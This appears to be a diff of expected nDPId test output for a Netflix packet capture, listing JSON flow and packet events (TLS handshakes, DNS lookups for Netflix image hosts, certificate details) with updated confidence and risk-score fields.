{"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}}
+01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":231,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035080,"flow_last_seen":1484319035200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1484319035200,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01470{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":232,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319035080,"flow_last_seen":1484319035215,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"ts_msec":1484319035215,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035342,"flow_last_seen":1484319035342,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319035342,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1484319035342,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319035342,"pkt":"gCqoTGHM5JjWH70UCABFAABA3CdAAEAGQP3AqAEHNFkni8+OAbvRf5R9AAAAALAC\/\/8BVgAAAgQFtAEDAwUBAQgKH2TBaAAAAAAEAgAA"}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1484319035397,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319035397,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGMwk0WSeLwKgBBwG7z47YAyXj0X+UfqASRepXrQAAAgQFtAQCCAqtiMk\/H2TBaAEDAwg="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1484319035399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319035399,"pkt":"gCqoTGHM5JjWH70UCABFAAA0+2BAAEAGIdDAqAEHNFkni8+OAbvRf5R+2AMl5IAQEBW8GgAAAQEICh9kwZ2tiMk\/"}
-00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035342,"flow_last_seen":1484319035401,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1484319035401,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":279,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035342,"flow_last_seen":1484319035449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1484319035449,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035342,"flow_last_seen":1484319035401,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1484319035401,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":279,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035342,"flow_last_seen":1484319035449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1484319035449,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
 00599{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1484319035889,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":164,"pkt_l4_len":130,"ts_msec":1484319035889,"pkt":"AQBef\/\/65JjWH70UCABFAACW0KMAAAERNwrAqAEH7\/\/\/+tIQB2wAggqVTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMg0KU1Q6IHVybjptZHgtbmV0ZmxpeC1jb206c2VydmljZTp0YXJnZXQ6MA0KDQo="}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319036827,"flow_last_seen":1484319036827,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1484319036827,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1484319036827,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"ts_msec":1484319036827,"pkt":"gCqoTGHM5JjWH70UCABFAABHX6YAAP8R2KbAqAEHwKgBAeF3ADUAM2aFMVgBAAABAAAAAAAABHNoYTIDc2FuBGFrYW0HbmZseGltZwNuZXQAAAEAAQ=="}
-00742{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319036827,"flow_last_seen":1484319036827,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1484319036827,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"sha2.san.akam.nflximg.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319036827,"flow_last_seen":1484319036827,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1484319036827,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"sha2.san.akam.nflximg.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00558{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1484319036847,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"ts_msec":1484319036847,"pkt":"5JjWH70UgCqoTGHMCABFAAB74URAAEAR1dTAqAEBwKgBBwA14XcAZ3RRMViBgAABAAIAAAAABHNoYTIDc2FuBGFrYW0HbmZseGltZwNuZXQAAAEAAcAMAAUAAQAAACAAGAVlMzA2NwRkc2NnCmFrYW1haWVkZ2XAIsA3AAEAAQAAABIABGhWYbM="}
-00757{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":324,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319036827,"flow_last_seen":1484319036847,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"ts_msec":1484319036847,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"sha2.san.akam.nflximg.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.86.97.179"}}
+00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":324,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319036827,"flow_last_seen":1484319036847,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"ts_msec":1484319036847,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"sha2.san.akam.nflximg.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.86.97.179"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319036854,"flow_last_seen":1484319036854,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319036854,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1484319036854,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319036854,"pkt":"gCqoTGHM5JjWH70UCABFAABAqeJAAEAGBR3AqAEHaFZhs8+VAbsXO1WDAAAAALAC\/\/+GqQAAAgQFtAEDAwUBAQgKH2THJwAAAAAEAgAA"}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1484319036865,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319036865,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwGsuNoVmGzwKgBBwG7z5WR\/xaXFztVhKAScSAP4QAAAgQFtAQCCAoCM2vSH2THJwEDAwU="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1484319036868,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319036868,"pkt":"gCqoTGHM5JjWH70UCABFAAA0UCJAAEAGXunAqAEHaFZhs8+VAbsXO1WEkf8WmIAQEBWfqAAAAQEICh9kxzUCM2vS"}
-00848{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319036854,"flow_last_seen":1484319036870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1484319036870,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
-00905{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319036854,"flow_last_seen":1484319036889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1484319036889,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"ef6b224ce027c8e21e5a25d8a58255a3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
-01335{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":333,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1484319036854,"flow_last_seen":1484319036900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3641,"flow_avg_l4_payload_len":404,"midstream":0,"ts_msec":1484319036900,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","server_names":"secure.cdn.nflximg.net,*.nflxext.com,*.nflxvideo.net,*.nflxsearch.net,*.nrd.nflximg.net,*.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"ef6b224ce027c8e21e5a25d8a58255a3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=Los Gatos, O=Netflix, Inc., OU=Content Delivery Operations, CN=secure.cdn.nflximg.net","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"0D:EF:D1:E6:29:11:1A:A5:88:B3:2F:04:65:D6:D7:AD:84:A2:52:26"}}
+00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319036854,"flow_last_seen":1484319036870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1484319036870,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+00931{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319036854,"flow_last_seen":1484319036889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1484319036889,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"ef6b224ce027c8e21e5a25d8a58255a3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+01361{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":333,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1484319036854,"flow_last_seen":1484319036900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3641,"flow_avg_l4_payload_len":404,"midstream":0,"ts_msec":1484319036900,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","server_names":"secure.cdn.nflximg.net,*.nflxext.com,*.nflxvideo.net,*.nflxsearch.net,*.nrd.nflximg.net,*.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"ef6b224ce027c8e21e5a25d8a58255a3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=Los Gatos, O=Netflix, Inc., OU=Content Delivery Operations, CN=secure.cdn.nflximg.net","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"0D:EF:D1:E6:29:11:1A:A5:88:B3:2F:04:65:D6:D7:AD:84:A2:52:26"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":604,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319042988,"flow_last_seen":1484319042988,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1484319042988,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1484319042988,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"ts_msec":1484319042988,"pkt":"gCqoTGHM5JjWH70UCABFAABGkh4AAP8Rpi\/AqAEHwKgBAecsADUAMtLh8roBAAABAAAAAAAAB2FydHdvcmsEYWthbQduZmx4aW1nA25ldAAAAQAB"}
-00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319042988,"flow_last_seen":1484319042988,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1484319042988,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"artwork.akam.nflximg.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319042988,"flow_last_seen":1484319042988,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1484319042988,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"artwork.akam.nflximg.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":609,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1484319043002,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":148,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":148,"pkt_l4_len":114,"ts_msec":1484319043002,"pkt":"5JjWH70UgCqoTGHMCABFAACG4UVAAEAR1cjAqAEBwKgBBwA15ywAct6B8rqBgAABAAMAAAAAB2FydHdvcmsEYWthbQduZmx4aW1nA25ldAAAAQABwAwABQABAAAAUwAUBWExOTA3BGRzY2cGYWthbWFpwCHANgABAAEAAAAHAAS4GcwZwDYAAQABAAAABwAEuBnMCg=="}
